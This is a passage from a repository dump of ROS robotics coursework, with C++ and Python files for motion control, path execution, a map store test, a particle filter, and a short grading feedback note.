return false;\n }\n\n // Ensure that the length of the quaternion is not close to zero\n tf::Quaternion tf_q(q.x, q.y, q.z, q.w);\n if (tf_q.length2() < 1e-6)\n {\n ROS_WARN(\"Quaternion has length close to zero.\");\n return false;\n }\n\n // Normalize the quaternion and check that it transforms the vertical\n // vector correctly\n tf_q.normalize();\n tf::Vector3 up(0, 0, 1);\n double dot = up.dot(up.rotate(tf_q.getAxis(), tf_q.getAngle()));\n if (fabs(dot - 1) > 1e-3)\n {\n ROS_WARN(\"The z-axis of the quaternion is not close to vertical.\");\n return false;\n }\n\n return true;\n }\n\n /** Publish a velocity command with the given x, y, and yaw values. */\n void publishVelocity(Velocity velocity)\n {\n geometry_msgs::Twist twist = velocity;\n velocity_publisher_.publish(twist);\n }\n\n /** Publish a velocity command which will stop the robot. */\n inline void publishZeroVelocity()\n {\n publishVelocity(Velocity());\n }\n\n /** Read the relevant parameters from server and create an instance of\n * the @ref VelocityController class. */\n void createVelocityController()\n {\n ros::NodeHandle pn(\"~\");\n\n double max_linear_velocity;\n double max_linear_acceleration;\n double linear_tolerance;\n double max_angular_velocity;\n double max_angular_acceleration;\n double angular_tolerance;\n std::string controller;\n\n pn.param(\"max_linear_velocity\", max_linear_velocity, 0.3);\n pn.param(\"max_linear_acceleration\", max_linear_acceleration, 0.05);\n pn.param(\"linear_tolerance\", linear_tolerance, 0.02);\n pn.param(\"max_angular_velocity\", max_angular_velocity, 0.2);\n pn.param(\"max_angular_acceleration\", max_angular_acceleration, 0.03);\n pn.param(\"angular_tolerance\", angular_tolerance, 0.02);\n pn.param(\"controller\", controller, std::string(\"omni\"));\n\n if (controller != \"diff\" && controller != \"omni\")\n {\n ROS_WARN(\"Invalid controller parameter (\\\"%s\\\"), will create omni.\", controller.c_str());\n controller = \"omni\";\n }\n\n if (controller == \"diff\")\n {\n velocity_controller_ = VelocityController::UPtr(\n new DiffVelocityController(\n max_linear_velocity, linear_tolerance,\n max_angular_velocity, angular_tolerance\n )\n );\n }\n else if (controller == \"omni\")\n {\n velocity_controller_ = VelocityController::UPtr(\n new OmniVelocityController(\n max_linear_velocity, max_linear_acceleration,linear_tolerance,\n max_angular_velocity, max_angular_acceleration, angular_tolerance\n )\n );\n }\n }\n\n typedef actionlib::SimpleActionServer<amr_msgs::MoveToAction> MoveToActionServer;\n typedef std::unique_ptr<MoveToActionServer> MoveToActionServerUPtr;\n\n MoveToActionServerUPtr move_to_server_;\n\n ros::Publisher velocity_publisher_;\n ros::Publisher current_goal_publisher_;\n ros::Publisher action_goal_publisher_;\n\n ros::Subscriber simple_goal_subscriber_;\n ros::Subscriber obstacles_subscriber_;\n\n tf::TransformListener transform_listener_;\n\n VelocityController::UPtr velocity_controller_;\n\n /// Frequency at which the velocity commands are reissued during action execution.\n double controller_frequency_;\n\n /// Flag that controls whether the robot should stop and cancel the current action if faced an obstacle.\n bool abort_if_obstacle_detected_;\n\n /// Current goal pose (in global reference frame).\n tf::Stamped<tf::Pose> target_pose_;\n\n};\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"motion_controller\");\n MotionControllerNode mcn;\n ros::spin();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.6140350699424744,
"alphanum_fraction": 0.6164973974227905,
"avg_line_length": 41.47058868408203,
"blob_id": "d6c2d275b542b98f71494f412424ac528b41756c",
"content_id": "c4de8566f9f66891f1c05a506113929ae814053c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6498,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 153,
"path": "/amr_navigation/nodes/path_executor.py",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nPACKAGE = 'amr_navigation'\nNODE = 'path_executor'\n\nimport roslib\nroslib.load_manifest(PACKAGE)\nimport rospy\n\nfrom smach_msgs.msg import SmachContainerStatus\nfrom actionlib import SimpleActionClient, SimpleActionServer\nfrom nav_msgs.msg import Path\nfrom amr_msgs.msg import MoveToAction, MoveToGoal, ExecutePathAction, \\\n ExecutePathFeedback, ExecutePathResult\n\n\nclass PathExecutor:\n\n SLEEP_RATE = 5\n GOAL_SUCCEEDED = 3\n GOAL_ABORTED = 4 \n\n def __init__(self, move_to_topic, execute_path_topic, path_publisher_topic, wall_follower_topic, timeout):\n '''\n Initialized all needed variables and starts the client, server and publisher.\n '''\n self.goal = None\n self.waypoint_toggle = False\n self.path_index = 0\n self.waypoint_unreachable = False\n self.loop_rate = rospy.Rate(PathExecutor.SLEEP_RATE)\n self.timeout = rospy.Duration(timeout)\n self.timeout_val = timeout\n self.timer =None;\n\n self.client = SimpleActionClient(move_to_topic, MoveToAction)\n self.client.wait_for_server()\n self.publisher = rospy.Publisher(path_publisher_topic, Path)\n if not wall_follower_topic == None:\n self.wall_follower = rospy.Subscriber(wall_follower_topic, SmachContainerStatus, self.wall_follower_cb)\n self.server = SimpleActionServer(execute_path_topic, ExecutePathAction, self.execute_cb, False)\n self.server.start()\n \n rospy.loginfo(\"Path executor ready with timout : {0}\".format(self.timeout_val));\n pass\n\n def execute_cb(self, action_path):\n '''\n Is called when a new path is send to this node. Each waypoint is then \n send to a motion controller if the previous was reached or is unreachable. \n '''\n rospy.loginfo(\"Received new path\")\n self.publisher.publish(action_path.path)\n \n self.result = ExecutePathResult()\n [self.result.visited.append(0) for pose in action_path.path.poses]\n \n self.path_index = 0\n self.goal = MoveToGoal()\n self.goal.target_pose = action_path.path.poses[self.path_index] \n self.client.send_goal(self.goal, done_cb=self.move_to_done_cb)\n \n while not rospy.is_shutdown():\n \n # Checks if preemption was requested and if yes, than preempts the path executor.\n if self.server.is_preempt_requested():\n self.server.set_preempted(self.result)\n rospy.logwarn(\"Preempted path execution\")\n break\n \n # Waypoint_toggle is set by move_to_done_cb and signalizes that a waypoint was reached or is unreachable.\n if self.waypoint_toggle:\n self.waypoint_toggle = False\n self.path_index += 1\n \n # If waypoint is unreachable and it's not allowed to skip a waypoint, path executor aborts.\n if self.waypoint_unreachable and not action_path.skip_unreachable:\n self.server.set_aborted(self.result)\n rospy.logwarn(\"Aborted path execution\")\n break\n pass\n \n # Send the next waypoint to a motion controller. If there is no next waypoint, path executor succeeded.\n if self.path_index < len(action_path.path.poses):\n self.goal = MoveToGoal()\n self.goal.target_pose = action_path.path.poses[self.path_index]\n self.client.send_goal(self.goal, done_cb=self.move_to_done_cb)\n else:\n self.server.set_succeeded(self.result)\n rospy.logwarn(\"Succeeded path execution\")\n break\n \n self.loop_rate.sleep()\n pass\n \n def move_to_done_cb(self, state, result):\n '''\n Is called when a waypoint is reached. Toggles a waypoint_toggle to\n signalize the execute_cb to send the next waypoint to a motion controller.\n '''\n feedback = ExecutePathFeedback()\n feedback.pose = self.goal.target_pose\n \n # Evaluates the state\n if state == PathExecutor.GOAL_SUCCEEDED:\n rospy.loginfo(\"Waypoint [%.2f, %.2f] reached\", self.goal.target_pose.pose.position.x, self.goal.target_pose.pose.position.y)\n feedback.reached = True\n elif state == PathExecutor.GOAL_ABORTED:\n rospy.loginfo(\"Waypoint [%.2f, %.2f] unreachable\", self.goal.target_pose.pose.position.x, self.goal.target_pose.pose.position.y)\n feedback.reached = False\n self.waypoint_unreachable = True\n \n self.result.visited[self.path_index] = feedback.reached\n self.server.publish_feedback(feedback)\n self.waypoint_toggle = True\n pass\n def wall_follower_cb(self, data):\n self.wallfollower_current_state = data.active_states[0]\n if(self.wallfollower_current_state == 'FOLLOW_WALL'):\n if self.is_timeout_available():\n self.timer = rospy.Timer(self.timeout, self.timer_cb, oneshot=True);\n elif(self.wallfollower_current_state == 'None'):\n if not(self.timer == None):\n self.timer.shutdown();\n pass\n\n def is_timeout_available(self):\n return not(self.timeout_val == 0)\n pass\n def timer_cb(self,event):\n rospy.logwarn(\"goal premted due to timeout\")\n if(self.wallfollower_current_state == 'FOLLOW_WALL'):\n self.waypoint_toggle = True\n self.waypoint_unreachable = True\n if not(self.timer == None):\n self.timer.shutdown();\n\nif __name__ == '__main__':\n rospy.init_node(NODE)\n move_to_topic = '/motion_controller/move_to'\n execute_path_topic = '/path_executor/execute_path'\n path_publisher_topic = '/path_executor/current_path'\n obstacle_avoidance_timeout = 0;\n wall_follower_topic = None\n if rospy.get_param('~use_obstacle_avoidance', True):\n move_to_topic = '/bug2/move_to'\n wall_follower_topic = '/smach_inspector/smach/container_status'\n if rospy.has_param('~obstacle_avoidance_timeout'):\n obstacle_avoidance_timeout = rospy.get_param('~obstacle_avoidance_timeout')\n \n pe = PathExecutor(move_to_topic, execute_path_topic, path_publisher_topic,wall_follower_topic,obstacle_avoidance_timeout)\n rospy.spin()\n pass\n"
},
{
"alpha_fraction": 0.7055476307868958,
"alphanum_fraction": 0.7439544796943665,
"avg_line_length": 36,
"blob_id": "4b97c8bf73979c5dcdb8996f0b848fb1fbd38d85",
"content_id": "7d1c9d7edef7c0a8b07f106e74f39014a914b2f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 703,
"license_type": "no_license",
"max_line_length": 291,
"num_lines": 19,
"path": "/grades/20140607.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Comments: 1/1 \n* Motion model: 1.5/1.5\n* New particle generation: 0.5/0.5\n* Resampling: 0.5/1.5\n* Low overall weight firewall: 0.5/0.5\n* Increased robustness by adding random particles: 0/0.5\n* Best pose estimate: 0.5/0.5\n\n_Total:_ 4.5 points\n\nFeedback\n========\n\nYour implementation of a low overall weight firewall is to kill all particles with low weight. This is generally a good idea, but instead you could have just added a number of random particles every round, as was advised. This way you would increase the robustness of your approach by a lot.\n\nYou resampling step is erroneous, as you do not start the roulette wheel with a random number, which is the basis for the approach.\n"
},
{
"alpha_fraction": 0.667271077632904,
"alphanum_fraction": 0.6731640696525574,
"avg_line_length": 31.91044807434082,
"blob_id": "b289f2f63303749f5222fe41fdf650f2b27b3a19",
"content_id": "79bf3e70050756e7851c2e32828c12a1d1699bd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2206,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 67,
"path": "/amr_navigation/src/diff_velocity_controller.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include \"diff_velocity_controller.h\"\n\nDiffVelocityController::DiffVelocityController(double l_max_vel, double l_tolerance,\n double a_max_vel, double a_tolerance)\n: l_max_vel_(l_max_vel)\n, l_tolerance_(l_tolerance)\n, a_max_vel_(a_max_vel)\n, a_tolerance_(a_tolerance)\n{\n}\n\nvoid DiffVelocityController::setTargetPose(const Pose& pose)\n{\n target_pose_ = pose;\n linear_complete_ = false;\n angular_complete_ = false;\n}\n\nbool DiffVelocityController::isTargetReached() const\n{\n return linear_complete_ & angular_complete_;\n}\n\nVelocity DiffVelocityController::computeVelocity(const Pose& actual_pose)\n{\n // Displacement and orientation to the target in world frame\n double dx = target_pose_.x - actual_pose.x;\n double dy = target_pose_.y - actual_pose.y;\n\n // Step 1: compute remaining distances\n double linear_dist = getDistance(target_pose_, actual_pose);\n double angular_dist = getShortestAngle(target_pose_.theta, actual_pose.theta);\n\n if (std::abs(linear_dist) < l_tolerance_ && std::abs(angular_dist) < a_tolerance_)\n {\n linear_complete_ = true;\n angular_complete_ = true;\n return Velocity();\n }\n\n if (std::abs(linear_dist) > l_tolerance_)\n // We still need to drive to the target, therefore we first need to make\n // sure that we are oriented towards it.\n angular_dist = getShortestAngle(atan2(dy, dx), actual_pose.theta);\n\n // Step 2: compute velocities\n double linear_vel = 0.0;\n double angular_vel = 0.0;\n\n if (std::abs(linear_dist) > l_tolerance_)\n linear_vel = std::abs(linear_dist) > 5 * l_tolerance_ ? l_max_vel_ : l_tolerance_;\n\n if (std::abs(angular_dist) > a_tolerance_)\n angular_vel = std::abs(angular_dist) > 5 * a_tolerance_ ? a_max_vel_ : a_tolerance_;\n\n if (std::abs(angular_dist) > a_tolerance_ * 5)\n {\n // We need to rotate a lot, so stand still and rotate with max velocity.\n return Velocity(0, 0, std::copysign(angular_vel, angular_dist));\n }\n else\n {\n // We need to rotate just a bit (or do not need at all), so it is fine to\n // combine with linear motion if needed.\n return Velocity(std::copysign(linear_vel, linear_dist), 0, std::copysign(angular_vel, angular_dist));\n }\n}\n\n"
},
{
"alpha_fraction": 0.49086716771125793,
"alphanum_fraction": 0.5169356465339661,
"avg_line_length": 24.51131248474121,
"blob_id": "724458eccb03ef15752ea04c282157b2973b855f",
"content_id": "8edc1ccb1eed466cee0a4f5ddfff4a48c3245652",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 11279,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 442,
"path": "/amr_mapping/src/map_store_test.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "WINDOWS-1252",
"text": "\n// list here *ALL* header files include from map-store.h\n#include <exception>\n#include <list>\n\n// allow us access to internals of map-store classes\n#define private protected\n#include \"map-store.h\"\n#include \"map-store-cone.h\"\n\n// process other includes normally\n#undef private\n\n#include <iostream>\n#include <math.h>\n#include <stdlib.h>\n#include <stdio.h>\n#include <string.h>\n\nusing namespace MobileRobots;\n\nstruct FailInfo {\n FailInfo(int chk, int expected, const char *item) : found(chk), required(expected), info(0) {\n if (item)\n info = strdup(item);\n }\n\n FailInfo(const FailInfo &old) : found(old.found), required(old.required), info(0) {\n if (old.info)\n info = strdup(old.info);\n }\n\n ~FailInfo() {\n if (info)\n free(info);\n }\n\n int found;\n int required;\n char *info;\n\nprivate:\n FailInfo &operator=(const FailInfo &old);\n};\n\nstruct TestLine {\n TestLine(double xs, double ys, double xe, double ye) : startX(xs), startY(ys), endX(xe), endY(ye) {\n dx = xe-xs;\n dy = ye-ys;\n len = sqrt( dx*dx + dy*dy );\n dxnorm = dx/len;\n dynorm = dy/len;\n\n }\n\n double pointDist(double tx, double ty) {\n double tdx = tx - startX;\n double tdy = ty - startY;\n\n double project = vScal(tdx, tdy);\n /*\n fx = startX + dxnorm*project;\n fy = startY + dynorm*project;\n\n distx = tx - fx; // = tdx + startX - fx\n disty = ty - fy; // = tdy + startY - fy\n\n distx = tdx - dxnorm*project;\n disty = tdy - dynorm*project;\n */\n\n tdx -= dxnorm*project;\n tdy -= dynorm*project;\n\n return sqrt(tdx*tdx + tdy*tdy);\n }\n\n double pointProjection(double tx, double ty) {\n double tdx = tx - startX;\n double tdy = ty - startY;\n\n return vScal(tdx, tdy);\n }\n\n double vScal(double tx, double ty) {\n return (tx*dxnorm + ty*dynorm);\n }\n\n double vScal(double x1, double y1, double x2, double y2) {\n return (x1*x2 + y1*y2);\n }\n\n double startX, startY, endX, endY;\n double dx,dy,len;\n\n double dxnorm, dynorm;\n};\n\nusing std::cout;\nusing std::endl;\n\nclass MapStoreTest : public MapStore {\npublic:\n MapStoreTest() : MapStore(10,10), okCnt(0), failCnt(0) {\n\n // checking sizes\n cout << \"Checking map sizes ...\" << endl;\n checkVal(minX(), -5, \"minX\");\n checkVal(maxX(), 5, \"maxX\");\n checkVal(minY(), -5, \"minY\");\n checkVal(maxY(), 5, \"maxY\");\n\n cout << \"Checking limit tests ...\" << endl;\n int x;\n for (x = -7; x < 7; x++) {\n if (x < -5) {\n\t// outside\n\tif (isInX(x))\n\t reportFail(x, \"false expected, but true found\", \"isInX\");\n } else if (x > 5) {\n\t// outside\n\tif (isInX(x))\n\t reportFail(x, \"false expected, but true found\", \"isInX\");\n } else {\n\t// inside\n\tif (!isInX(x))\n\t reportFail(x, \"true expected, but false found\", \"isInX\");\n }\n }\n\n /*\n for(x = -7; x < 7; x++) {\n for(dx = 1; dx < 5; dx++) {\n\tint xt = t;\n\tint dxt = dx;\n\tconvXRange(xt, dxt);\n\tif (x < -5) {\n\t // outside\n\t if (isInX(x))\n\t reportFail(x, \"false expected, but true found\", \"isInX\");\n\t} else if (x > 5) {\n\t // outside\n\t if (isInX(x))\n\t reportFail(x, \"false expected, but true found\", \"isInX\");\n\t} else {\n\t // inside\n\t if (!isInX(x))\n\t reportFail(x, \"true expected, but false found\", \"isInX\");\n\t}\n }\n }\n */\n\n cout << \"Checkking fillRect() ...\" << endl;\n fillRect(-2,-2,5,6, 1.5);\n\n cout << \"Checking trace() ...\" << endl;\n int xs = -4;\n int ys = -4;\n int xe = -4;\n int ye = -4;\n FILE *fh = fopen(\"beamdata.txt\", \"w\");\n for (xe = -3; xe < 5; xe++) {\n fprintf(fh, \"\\n\\n\");\n checkBeam(xs, ys, xe, ye, -2, -2, -2+5-1, -2+6-1, 1.5, fh);\n fprintf(fh, \"e\\n\");\n }\n xe = 4;\n for (ye = -3; ye < 5; ye++) {\n fprintf(fh, \"\\n\\n\");\n checkBeam(xs, ys, xe, ye, -2, -2, -2+5-1, -2+6-1, 1.5, fh);\n fprintf(fh, \"e\\n\");\n }\n ye = 4;\n for (xe = 3; xe > -4; xe--) {\n fprintf(fh, \"\\n\\n\");\n checkBeam(xs, ys, xe, ye, -2, -2, -2+5-1, -2+6-1, 1.5, fh);\n fprintf(fh, \"e\\n\");\n }\n xe = -4;\n for (ye = 3; ye > -4; ye--) {\n fprintf(fh, \"\\n\\n\");\n checkBeam(xs, ys, xe, ye, -2, -2, -2+5-1, -2+6-1, 1.5, fh);\n fprintf(fh, \"e\\n\");\n }\n fclose(fh);\n }\n\n ~MapStoreTest() {\n cout << \"Done\" << endl;\n }\n\n bool checkBeam(int startX, int startY, int endX, int endY, int filledSX, int filledSY, int filledEX, int filledEY, double filledVal, FILE *fh) {\n cout << \"Checking beam (\" << startX << \", \" << startY << \") --> (\" << endX << \", \" << endY << \") ... \";\n double dx = endX-startX;\n double dy = endY-startY;\n double dir = atan2(dy, dx);\n double len = sqrt( dx*dx + dy*dy );\n MapStoreTrace tr = trace(startX,startY, dir, len);\n MapStoreTrace::MapIt iter = tr.traceStart();\n\n TestLine myLine(startX, startY, endX, endY);\n\n bool res = true;\n const double sqrt2 = sqrt(2);\n MapStoreCell cell;\n int idx = 0;\n while (iter != tr.traceEnd()) {\n cell = *iter;\n iter++;\n double dist = myLine.pointDist(cell.x, cell.y);\n double linePart = myLine.pointProjection(cell.x, cell.y);\n // cout << \" # \" << idx << \": (\" << (startX+linePart*cos(dir)) << \", \" << (startY+linePart*sin(dir)) << \") <-> (\" << cell.x << \", \" << cell.y << \")\" << endl;\n if (fh != 0)\n\tfprintf(fh, \"%d %.3f %.3f %d %d\\n\", idx, startX+linePart*cos(dir), startY+linePart*sin(dir), cell.x, cell.y);\n if (dist > sqrt2) {\n\tif (res)\n\t cout << endl;\n\tcout << \"point \" << cell.x << \" \" << cell.y << \" not on line: dist = \" << dist << endl;\n\tres = false;\n }\n if ( (filledSX <= cell.x) && (cell.x <= filledEX) &&\n\t (filledSY <= cell.y) && (cell.y <= filledEY) ) {\n\t// inside filled region\n\tif (cell.val != filledVal) {\n\t cout << \"Cell (\" << cell.x << \", \" << cell.y << \") value \" << cell.val << \", expected \" << filledVal << endl;\n\t res = false;\n\t}\n } else {\n\t// outside filled region\n\tif (cell.val != 0) {\n\t cout << \"Cell (\" << cell.x << \", \" << cell.y << \") value \" << cell.val << \", expected 0\" << endl;\n\t res = false;\n\t}\n }\n\n idx += 1;\n }\n if (cell.x != endX || cell.y != endY) {\n cout << \"Endpoint \" << endX << \" \" << endY << \" not reached, last point is \" << cell.x << \" \" << cell.y << endl;\n res = false;\n }\n if (res)\n cout << \"OK\" << endl;\n return res;\n }\n\n void reportFail(int arg, const char *explain, const char *item) {\n cout << item << \": arg \" << arg << \", result: \" << explain << endl;\n failCnt += 1;\n }\n\n bool checkVal(int chk, int expected, const char *item) {\n cout << item << \": req \" << expected << \", is \" << chk;\n if (chk == expected) {\n cout << \" : OK\" << endl;\n okCnt += 1;\n return true;\n } else {\n cout << \" : FAIL\" << endl;\n failCnt += 1;\n failureList.push_back(FailInfo(chk, expected, item));\n return false;\n }\n }\n\n bool growTest(void) {\n cout << \"Checking map grow() ...\" << endl;\n\n // first fill the map with data, to check if the content is not mixed\n int x1,y1;\n for (x1 = -5; x1 < 6; x1++) {\n for (y1 = -5; y1 < 6; y1++) {\n\tset(x1, y1, x1 + 6 + (y1 + 6) * 30);\n }\n }\n \n // should gow from -5..5 / -5..5 to -6..10 / -5..11\n grow(2, 3, 8);\n checkVal(minX(), -6, \"minX\");\n checkVal(maxX(), 10, \"maxX\");\n checkVal(minY(), -5, \"minY\");\n checkVal(maxY(), 11, \"maxY\");\n\n cout << \" checking range tests after grow() ...\" << endl;\n\n bool testVal = false;\n bool bomb = false;\n for (x1 = -7; x1 < 12; x1++) {\n for (y1 = -7; y1 < 13; y1++) {\n\ttestVal = false;\n\tif ( (-5 <= x1) && (x1 <= 5) ) {\n\t if ( (-5 <= y1) && (y1 <= 5) ) {\n\t // within original area\n\t testVal = true;\n\t }\n\t}\n\tbomb = true;\n\tif ( (-6 <= x1) && (x1 <= 10) ) {\n\t if ( (-5 <= y1) && (y1 <= 11) ) {\n\t // within original area\n\t bomb = false;\n\t }\n\t}\n\ttry {\n\t double val = get(x1, y1);\n\t if (bomb) {\n\t cout << \" error: expected 'Range' exception, but nothing happened: (\" << x1 << \", \" << y1 << \")\" << endl;\n\t }\n\t char checkbuf[30];\n\t snprintf(checkbuf, 29, \" cell (%d, %d) \", x1, y1);\n\t if (testVal) {\n\t checkVal(val, x1 + 6 + (y1 + 6) * 30, checkbuf);\n\t }\n\t /*\n\t // new values are not initialized, so nothing to test here.\n\t else {\n\t checkVal(val, 0, checkbuf);\n\t }\n\t */\n\t} catch (MapStoreError er) {\n\t if (bomb) {\n\t if (er.getType() == MapStoreError::Range)\n\t cout << \" OK received expected exception\" << endl;\n\t else\n\t cout << \" error received exception as expected, but of wrong type '\" << er.what() << \"'\" << endl;\n\t } else {\n\t cout << \" error: unexpected '\" << er.what() << \"' exception: (\" << x1 << \", \" << y1 << \")\" << endl;\n\t }\n\t}\n }\n }\n return (failCnt == 0);\n }\n\n void loadTest(void) {\n if (loadMap(\"maploadfile.txt\")) {\n cout << \"loaded map successfully. New map size: \" << sizeX << \", \" << sizeY << endl;\n cout << \"New origin: \" << originX << \", \" << originY << endl;\n } else {\n cout << \"Failed to load map\" << endl;\n }\n }\n \nprivate:\n int okCnt;\n int failCnt;\n std::list<FailInfo> failureList;\n};\n\nint main(int argc, char *argv[]) {\n\n MapStoreTest myTest;\n\n double dir;\n for (dir = 0; dir <= 90; dir += 15) {\n cout << \"Checking cone \" << dir << \"° ...\" << endl;\n cout << \" preparing ...\" << endl;\n myTest.eraseRect(-5,-5, 11,11);\n /*\n cout << \" running fillCone ...\" << endl;\n myTest.fillCone(-4,-4, dir/180.0*M_PI, 30.0/180.0*M_PI, 8, 3);\n */\n int x,y;\n double val;\n\n cout << \" creating cone iterator ...\" << endl;\n MapStoreCone myCone(-4,-4, dir/180.0*M_PI, 30.0/180.0*M_PI, 8);\n {\n MapStoreBeam beamInfoCenter(-4.0,-4.0, dir/180.0*M_PI, 8.0);\n MapStoreBeam beamInfoLeft(-4.0,-4.0, dir/180.0*M_PI + 30.0/180.0*M_PI/2, 8.0);\n MapStoreBeam beamInfoRight(-4.0,-4.0, dir/180.0*M_PI - 30.0/180.0*M_PI/2, 8.0);\n beamInfoCenter.getInitCell(x,y);\n do {\n\tif (!myTest.isInX(x))\n\t continue;\n\tif (!myTest.isInY(y))\n\t continue;\n\tmyTest.set(x,y, 4);\n } while(beamInfoCenter.nextCell(x,y));\n\n beamInfoLeft.getInitCell(x,y);\n do {\n\tif (!myTest.isInX(x))\n\t continue;\n\tif (!myTest.isInY(y))\n\t continue;\n\tmyTest.set(x,y, 4);\n } while(beamInfoLeft.nextCell(x,y));\n\n beamInfoRight.getInitCell(x,y);\n do {\n\tif (!myTest.isInX(x))\n\t continue;\n\tif (!myTest.isInY(y))\n\t continue;\n\tmyTest.set(x,y, 4);\n } while(beamInfoRight.nextCell(x,y));\n }\n\n cout << \" running cone iterator ...\" << endl;\n while(myCone.nextCell(x,y)) {\n if (!myTest.isInX(x))\n\tcontinue;\n if (!myTest.isInY(y))\n\tcontinue;\n val = myTest.get(x,y);\n if (val != 3) {\n\t//\tcout << \"Read cone cell (\" << x << \", \" << y << \"): wrong value \" << val << endl;\n }\n if (val == 0)\n\tmyTest.set(x,y,1);\n }\n\n cout << endl;\n for(y=-5; y < 6; y++) {\n for(x=-5; x < 6; x++) {\n\tval = myTest.get(x,y);\n\tif (val == 3) {\n\t //\t cout << \"Read non-cone cell (\" << x << \", \" << y << \"): wrong value \" << val << endl;\n\t cout << \" #\";\n\t} else if (val == 1) {\n\t cout << \" +\";\n\t} else if (val == 4) {\n\t cout << \" *\";\n\t} else {\n\t cout << \" .\";\n\t}\n }\n cout << endl;\n }\n }\n\n myTest.growTest();\n \n myTest.loadTest();\n \n // save it again\n FILE *savefile = fopen(\"mapsavefile.plot\", \"w\");\n myTest.dumpGP(savefile, \"dump of loaded map\");\n\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.6558420658111572,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 28.60377311706543,
"blob_id": "c76899c2d8bc6f0a96cb85f691f55563bccd6942",
"content_id": "5fe7459215b330bc26c57f2086e452e811a99c13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3141,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 106,
"path": "/amr_localization/src/particle_filter.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#define _USE_MATH_DEFINES\n#include <cmath>\n#include <random>\n\n#include <ros/console.h>\n\n#include \"particle_filter.h\"\n\nParticleFilter::ParticleFilter(double map_min_x, double map_max_x, double map_min_y, double map_max_y, ComputeParticleWeightCallback callback)\n: callback_(callback)\n, motion_model_(0.02, 0.01)\n, random_particle_generator_(map_min_x, map_max_x, map_min_y, map_max_y)\n, particle_set_size_(100)\n, motion_guesses_(1)\n, is_initialized(false)\n{\n}\n\nvoid ParticleFilter::update(double x, double y, double yaw)// desired motion\n{\n Particle particle;\n Pose best_pose;\n double best_weight = 0.0;\n double weight_sum = 0.0;\n ParticleVector particles_new;\n ParticleVector::iterator particles_new_iterator;\n particles_new_iterator = particles_new.begin();\n\n double resample_pos = 0.0;\n double resample_step = 0.0;\n double weight_pos = 0.0;\n int particle_index = 0;\n ParticleVector particles_resampled;\n particles_resampled.resize(particle_set_size_);\n\n int new_samples;\n int sample_to_replace;\n\n motion_model_.setMotion(x, y, yaw);\n\n // Create initial particle set\n if (!is_initialized)\n {\n is_initialized = true;\n particles_.resize(particle_set_size_);\n for (int i = 0; i < particle_set_size_; i++)\n {\n particles_.at(i) = random_particle_generator_.generateParticle();\n }\n }\n\n // Create new particles and calculates their weight\n for (int index_particle = 0; index_particle < particle_set_size_; index_particle++)\n {\n for (int index_motion = 0; index_motion < motion_guesses_; index_motion++)\n {\n // Create new particles based on motion and save them\n particle.pose = motion_model_.sample(particles_.at(index_particle).pose);\n particle.weight = callback_(particle);\n particles_new_iterator = particles_new.insert(particles_new_iterator, particle);\n\n // Save the weight sum for resampling\n weight_sum = weight_sum + particle.weight;\n\n // Set best pose based on the weight\n if (particle.weight > best_weight)\n {\n best_weight = particle.weight;\n best_pose = particle.pose;\n }\n }\n }\n\n // Resampling\n resample_step = weight_sum / particle_set_size_;\n for (int i = 0; i < particle_set_size_; i++)\n {\n while (resample_pos > (weight_pos + particles_new.at(particle_index).weight))\n {\n weight_pos = weight_pos + particles_new.at(particle_index).weight;\n particle_index++;\n }\n particles_resampled.at(i) = particles_new.at(particle_index);\n resample_pos = resample_pos + resample_step;\n }\n\n // Filtering bad samples out and create new ones\n for (int i = 0; i < particle_set_size_; i++)\n {\n if (particles_resampled.at(i).weight < 0.5)\n {\n particles_resampled.at(i) = random_particle_generator_.generateParticle();\n }\n }\n\n // Replace 25% of the samples\n// new_samples = lround(particle_set_size_ * 0.25);\n// for (int i = 0; i < new_samples; i++)\n// {\n// sample_to_replace = rand() % particle_set_size_;\n// particles_resampled.at(sample_to_replace) = random_particle_generator_.generateParticle();\n// }\n\n pose_estimate_ = best_pose;\n particles_ = particles_resampled;\n}\n\n\n\n"
},
{
"alpha_fraction": 0.7224168181419373,
"alphanum_fraction": 0.7232924699783325,
"avg_line_length": 24.93181800842285,
"blob_id": "af9025237aaa968dfb3b37ae10163132061842ee",
"content_id": "26bdc0f8280e8853179e91c162aaf877c408a3d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1142,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 44,
"path": "/amr_navigation/include/diff_velocity_controller.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef DIFF_VELOCITY_CONTROLLER_H\n#define DIFF_VELOCITY_CONTROLLER_H\n\n#include \"velocity_controller.h\"\n\n/** A simple implementation of velocity controller that drives the robot as if\n * it had a differential drive base.\n *\n * The base is assumed to have 2 degrees of freedom, i.e. can mave forwards\n * and rotate. The controller tries to orient the robot towards the goal and\n * then move it forwards until it is reached.\n *\n * The robot drives at a constant (max) velocity until it has almost reached\n * the goal pose, then it switches to the minimum velocity. */\nclass DiffVelocityController : public VelocityController\n{\n\npublic:\n\n DiffVelocityController(double l_max_vel, double l_tolerance,\n double a_max_vel, double a_tolerance);\n\n virtual void setTargetPose(const Pose& pose);\n\n virtual bool isTargetReached() const;\n\n virtual Velocity computeVelocity(const Pose& actual_pose);\n\nprivate:\n\n Pose target_pose_;\n\n bool linear_complete_;\n bool angular_complete_;\n\n double l_max_vel_;\n double 